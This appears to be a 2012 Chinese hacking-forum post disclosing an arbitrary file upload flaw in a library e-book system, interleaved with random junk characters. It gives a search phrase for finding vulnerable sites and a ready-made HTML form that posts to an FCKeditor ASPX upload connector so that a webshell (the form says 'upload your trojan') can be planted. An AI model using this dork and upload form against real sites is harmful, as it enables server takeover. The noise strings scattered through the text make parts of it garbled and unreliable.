主题:图书馆系统任意文件上传漏洞
! ?- x# Q, z, `+ h' x0 e 作者:冰锋刺客9 u1 n0 h i- y- i% z
厂商:点击书(dianjishu.com)
, j+ ~2 V, h- v5 ~4 K% I' z 日期:2012-6-21
. j( y& w, d/ k+ Q! ]/ P' ]% Y 0 _+ C) E4 N0 ?& x& Y% c
I 概述; G5 O4 K; p' u! x
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell; n/ H) b4 F# ~8 l( p9 T
II 简介
8 ^0 K3 }/ N2 \8 z$ ?3 u 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
, V( v: z% ~2 l( W: U 补充一个漏洞& C5 D4 l* d$ R% g/ p
<form id="frmUpload" enctype="multipart/form-data"
" ~% P* I) C9 O# B: ^ {0 g action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
; c( M; G( [/ N+ ~% M o <input id="btnUpload" type="submit" value="操翻他">
3 e7 \# p' K# M1 J </form>
4 i; ]8 g3 K1 ~+ Q" ` 你们懂的
* m8 p. Y8 {# O" V* C" O) m; ~5 w 那傻逼提供还需要改包.
$ Z. s" \) J8 T 自己看了下源代码发现fckeditor
9 f1 j8 O1 ~6 K% `; c 直接秒杀
$ P$ _8 F8 h) x7 |! Q% f9 @ |
发表于 2012-9-10 21:20:59
收藏
支持
反对